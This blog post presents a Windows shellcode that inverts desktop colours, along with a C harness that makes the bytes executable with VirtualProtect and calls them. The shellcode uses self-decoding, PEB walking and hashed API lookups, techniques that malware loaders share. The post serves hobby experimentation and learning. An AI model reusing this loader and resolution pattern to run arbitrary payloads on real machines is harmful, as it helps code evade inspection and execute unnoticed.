Shellcode to Invert Colors

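This is a simple shellcode I wrote for fun. It is pretty useless, but it's still fun to experiment with 🙂 The C program below is only a test harness: it marks the byte string executable with VirtualProtect, calls it, and then restores the original page protection.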

screenshot_1

# include <stdlib.h>
# include <stdio.h>
# include <string.h>
# include <windows.h>

/*
 * Title: Shellcode to Invert Colors in your Desktop
 * Author: Osanda Malith Jayathissa (@OsandaMalith)
 * Website: https://osandamalith.com
 * This was strictly made for fun 🙂        
 */
 
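/*
 * Test harness: makes the embedded byte string executable, calls it as a
 * function taking no arguments, then restores the previous page protection.
 *
 * Returns EXIT_FAILURE if the first VirtualProtect() call fails, otherwise
 * EXIT_SUCCESS (reached only if the payload returns to the caller).
 *
 * NOTE(review): the payload is opaque machine code; what it does cannot be
 * confirmed from this listing alone and should be verified by disassembly.
 */
int main(void) {
    /*
     * Payload bytes. The tail of the literal is plain ASCII: "kernel32.dll",
     * "gdi32.dll" and "user32.dll", each followed by a 0x05 byte.
     */
    char *shellcode =
        "\xe8\xff\xff\xff\xff\xc0\x5f\xb9\xce\x03\x02\x02\x81\xf1\x02\x02"
        "\x02\x02\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
        "\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x99\x01\x05\x05"
        "\xb9\x03\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83"
        "\xec\x10\x53\x56\x57\xb9\x8d\x10\xb7\xf8\xe8\xc7\x05\x05\x05\x8b"
        "\xf0\x68\xa5\x01\x05\x05\xff\xd6\x68\xb2\x01\x05\x05\xff\xd6\x68"
        "\xbc\x01\x05\x05\xff\xd6\xb9\xe0\x53\x31\x4b\xe8\xa6\x05\x05\x05"
        "\xb9\x49\x67\xd2\xbe\x89\x45\xf0\xe8\x99\x05\x05\x05\xb9\xdb\xda"
        "\xeb\xd0\x8b\xf0\xe8\x8d\x05\x05\x05\xb9\x4c\x0c\x02\xae\x89\x45"
        "\xfc\xe8\x80\x05\x05\x05\xb9\xa7\x0b\x59\x08\x89\x45\xf8\xe8\x73"
        "\x05\x05\x05\xb9\xaa\xf7\xb4\x69\x89\x45\xf4\xe8\x66\x05\x05\x05"
        "\x6a\x0a\x8b\xf8\x5b\x68\x09\x05\x55\x05\x6a\x05\x6a\x05\x6a\x05"
        "\xff\xd6\x50\x6a\x01\xff\xd7\x50\x6a\x05\xff\xd7\x50\x33\xc0\x50"
        "\x50\x50\xff\xd6\x50\xff\x55\xfc\x6a\x05\xff\xd6\x50\x6a\x05\xff"
        "\x55\xf8\x6a\x64\xff\x55\xf4\x4b\x75\xcb\x53\xff\x55\xf0\x5f\x5e"
        "\x33\xc0\x5b\xc9\xc3\x33\xd2\xeb\x10\xc1\xca\x0d\x3c\x61\x0f\xbe"
        "\xc0\x7c\x03\x83\xe8\x20\x03\xd0\x41\x8a\x01\x84\xc0\x75\xea\x8b"
        "\xc2\xc3\x8d\x41\xf8\xc3\x55\x8b\xec\x83\xec\x14\x53\x56\x57\x89"
        "\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b\x45\xfc\x8b\x40"
        "\x0c\x8b\x40\x14\x89\x45\xec\x8b\xf8\x8b\xcf\xe8\xd2\xff\xff\xff"
        "\x8b\x70\x18\x8b\x3f\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78"
        "\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x96\xff\xff\xff\x8b"
        "\x4c\x33\x20\x89\x45\xf8\x33\xc0\x03\xce\x89\x4d\xf0\x89\x45\xfc"
        "\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x75\xff\xff\xff"
        "\x03\x45\xf8\x39\x45\xf4\x74\x1c\x8b\x45\xfc\x8b\x4d\xf0\x40\x89"
        "\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\x9c\x33\xc0\x5f"
        "\x5e\x5b\xc9\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48\x0f\xb7"
        "\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6\xeb\xdf"
        "\x2b\x05\x05\x05\x32\x05\x05\x05\x39\x05\x05\x05\x6b\x65\x72\x6e"
        "\x65\x6c\x33\x32\x2e\x64\x6c\x6c\x05\x67\x64\x69\x33\x32\x2e\x64"
        "\x6c\x6c\x05\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x05";

    /*
     * strlen() stops at the first 0x00 byte, so it equals the payload size
     * only while the literal contains no embedded NUL. Measure once and
     * reuse the value for both protection changes.
     */
    size_t len = strlen(shellcode);
    DWORD oldProtect;

    /* %d expects an int; strlen() returns size_t, so convert explicitly. */
    wprintf(L"Length : %d bytes\n@OsandaMalith", (int)len);

    /*
     * VirtualProtect() works on whole pages, so every page that holds part
     * of the literal becomes readable, writable and executable until the
     * restore call below, including any unrelated data sharing those pages.
     * NOTE(review): write access is presumably requested because the payload
     * modifies its own bytes - confirm by disassembly. A protection change
     * to RWX followed by a call into that memory is a pattern endpoint
     * monitoring commonly alerts on.
     */
    BOOL ret = VirtualProtect(shellcode, len, PAGE_EXECUTE_READWRITE, &oldProtect);

    if (!ret) {
        fprintf(stderr, "%s", "Error Occured");
        return EXIT_FAILURE;
    }

    /* Transfer control to the byte string as if it were a void(void) function. */
    ((void(*)(void))shellcode)();

    /*
     * Put the original protection back. Reached only if the payload returns;
     * the result of this call is not checked (best effort).
     */
    VirtualProtect(shellcode, len, oldProtect, &oldProtect);

    return EXIT_SUCCESS;
}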

https://github.com/OsandaMalith/Shellcodes/blob/master/invert.c
